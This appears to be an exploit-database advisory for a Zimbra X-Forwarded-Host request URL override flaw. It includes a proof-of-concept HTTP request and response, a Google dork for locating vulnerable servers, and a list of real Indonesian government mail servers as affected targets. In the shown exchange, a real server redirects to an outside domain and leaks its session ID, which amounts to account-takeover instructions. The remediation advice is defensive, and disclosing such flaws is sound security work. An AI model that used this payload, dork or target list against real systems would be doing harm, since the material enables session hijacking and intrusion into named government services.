Zimbra - Request URL Override Vulnerability

2022.05.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-436

############################################################# # Exploit Title: Zimbra - Request URL Override Vulnerability # Exploit Author: Gh05t666nero # Author Team: The A Team - Kejaksaan Agung # Google Dork: inurl:/public/launchSidebar.jsp # Software Vendor: Zimbra # Software Version: * # Software Link: https://www.zimbra.com/downloads # Date: 2022-05-09 ############################################################# [*] About: ---------- Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client. ############################################################# [*] Detail: ----------- Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request. Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries. Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy enabling localised cache poisoning. The application appears to support the use of a custom HTTP header to override the Host header. Attacker added the following headers to the request: X-Forwarded-Host: cxsecurity.com A value from these headers was reflected in the response, showing that a header was processed. ############################################################# [*] Impact: ----------- This Zimbra vulnerability leaks users' cookies when they are redirected to a malicious site, allowing attackers to take over accounts via session (See value of response header "location"). ############################################################# [*] Remediation: ---------------- To fully resolve this issue, locate the component that processes the affected headers, and disable it entirely. If you are using a framework, applying any pending security updates may do this for you. If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed. ############################################################# [*] PoC: -------- # Request: GET /public/launchSidebar.jsp HTTP/2 Host: mail.polri.go.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: keep-alive Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 X-Forwarded-Host: cxsecurity.com Pragma: no-cache Cache-Control: no-cache TE: trailers # Response: HTTP/2 302 Found server: nginx date: Mon, 09 May 2022 04:48:53 GMT content-type: text/html;charset=utf-8 content-length: 0 strict-transport-security: max-age=31536000 x-xss-protection: 1; mode=block x-content-type-options: nosniff x-robots-tag: noindex x-frame-options: SAMEORIGIN expires: Thu, 01 Jan 1970 00:00:00 GMT cache-control: no-store, no-cache, must-revalidate, max-age=0 pragma: no-cache set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/ location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED X-Firefox-Spdy: h2 ############################################################# [*] Affected: -------------- https://mail.polri.go.id/public/launchSidebar.jsp https://mail.kejaksaan.go.id/public/launchSidebar.jsp And other vital Indonesian websites.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top